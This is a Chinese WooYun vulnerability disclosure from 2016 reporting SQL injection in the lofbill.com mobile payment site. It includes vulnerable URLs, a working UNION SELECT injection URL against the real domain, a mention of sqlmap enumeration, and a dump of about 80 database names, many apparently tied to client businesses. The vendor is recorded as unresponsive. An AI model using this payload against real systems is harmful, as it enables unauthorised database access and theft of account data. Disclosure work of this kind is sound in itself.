乐富宝移动支付业务存在SQL注射漏洞（账号密码等信息可被泄露）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0167473

漏洞标题：乐富宝移动支付业务存在SQL注射漏洞（账号密码等信息可被泄露）

漏洞作者：路人甲

提交时间：2016-01-05 14:12

修复时间：2016-02-12 18:49

公开时间：2016-02-12 18:49

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：13

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2016-01-05：积极联系厂商并且等待厂商认领中，细节不对外公开
2016-02-12：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

乐富宝定位于金融支付专家，提供网上支付、POS收单、无线支付、
互联网银行卡支付、电子卡支付等超过20多种金融增值产品和服务
并针对零售连锁、互联网金融、移动互联网游戏、医疗全国连锁等行业
提供量身定制的行业解决方案。
在产业链支付领域，平台支付系统提升电子商务水平已得到了诸多行业的广泛应用
在创新领域，乐富宝创新推出一站式平台
在POS收单领域，乐富宝针对城乡结构和小微企业差异化的市场需求
创新金融收单直销和外包结合的服务模式，补充金融服务的市场力量
在移动支付领域，在京东手机商城乐富宝移动平台等项目上已实现应用。

详细说明：

首页随随便便一找，就好几个注射漏洞：
http://lofbill.com/shopView.php?id=22
http://lofbill.com/service.php?id=30&act=1&flag=4
...
你们还是自查吧，这是大学生写的系统么？
http://www.lofbill.com/service.php?id=45%20and%201=2%20union%20select%201,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
可以union查询，用sqlmap自动化列表

奇怪的是账号信息分散在各个表中，有点像是针对客户进行的划分

又试了个证实猜想，然后深深的感觉这个支付真不专业，没挑战撤退。

漏洞证明：

[*] dmooo10_13321963777
[*] dmooo10_blc
[*] dmooo10_bn-film
[*] dmooo10_ctqygl
[*] dmooo10_donaldson
[*] dmooo10_dy
[*] dmooo10_fbz
[*] dmooo10_fengyalaw
[*] dmooo10_gyzt192
[*] dmooo10_hmtd
[*] dmooo10_hnyonghang
[*] dmooo10_jatofund
[*] dmooo10_jgsjy
[*] dmooo10_jiudian369
[*] dmooo10_jlxjc
[*] dmooo10_jprgsy
[*] dmooo10_jrhuanyu
[*] dmooo10_jsbdwl
[*] dmooo10_jsbond.com
[*] dmooo10_jsdztz
[*] dmooo10_jshtlaw
[*] dmooo10_jsqdsz
[*] dmooo10_jsxrd
[*] dmooo10_jszoms
[*] dmooo10_lerongcun
[*] dmooo10_lofbill
[*] dmooo10_longtengsrq
[*] dmooo10_lyningxin
[*] dmooo10_namegps
[*] dmooo10_nd
[*] dmooo10_nj-gb
[*] dmooo10_nj-huanli
[*] dmooo10_njfidel
[*] dmooo10_njfuhuang
[*] dmooo10_njjysw
[*] dmooo10_njkaifanle
[*] dmooo10_njlhdc
[*] dmooo10_njlsln
[*] dmooo10_njomd
[*] dmooo10_njsj
[*] dmooo10_njsmyw
[*] dmooo10_njxy2000
[*] dmooo10_njzjhq.com
[*] dmooo10_njzlhj
[*] dmooo10_njzydj
[*] dmooo10_opetechgroup
[*] dmooo10_qcsj
[*] dmooo10_reue
[*] dmooo10_rich-opto
[*] dmooo10_scyzbj
[*] dmooo10_sdl
[*] dmooo10_shuimujy
[*] dmooo10_supertvlive
[*] dmooo10_suweiyuan
[*] dmooo10_test
[*] dmooo10_tjsp
[*] dmooo10_tqy
[*] dmooo10_uk
[*] dmooo10_vancopanel
[*] dmooo10_wandarotomold
[*] dmooo10_waning66
[*] dmooo10_wdf365
[*] dmooo10_xdlunwenw
[*] dmooo10_xgkj
[*] dmooo10_xinhuimusic
[*] dmooo10_yaoyuezhubao
[*] dmooo10_yf-jt
[*] dmooo10_yipin
[*] dmooo10_yonghuaxin
[*] dmooo10_ypzs
[*] dmooo10_yslm
[*] dmooo10_ytxc
[*] dmooo10_yunshumao
[*] dmooo10_zhangyuanshufa
[*] dmooo10_zhonghengfund
[*] dmooo10_zjmls
[*] information_schema
[*] test

修复方案：

找开发商。

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

未能联系到厂商或者厂商积极拒绝

漏洞Rank：10 (WooYun评价)

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0167473

漏洞标题：乐富宝移动支付业务存在SQL注射漏洞（账号密码等信息可被泄露）

相关厂商：乐富宝

漏洞作者：路人甲

提交时间：2016-01-05 14:12

修复时间：2016-02-12 18:49

公开时间：2016-02-12 18:49

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：13

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0167473

漏洞标题：乐富宝移动支付业务存在SQL注射漏洞（账号密码等信息可被泄露）

相关厂商：乐富宝

漏洞作者： 路人甲

提交时间：2016-01-05 14:12

修复时间：2016-02-12 18:49

公开时间：2016-02-12 18:49

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：13

漏洞状态：未联系到厂商或者厂商积极忽略

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2016-0167473"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云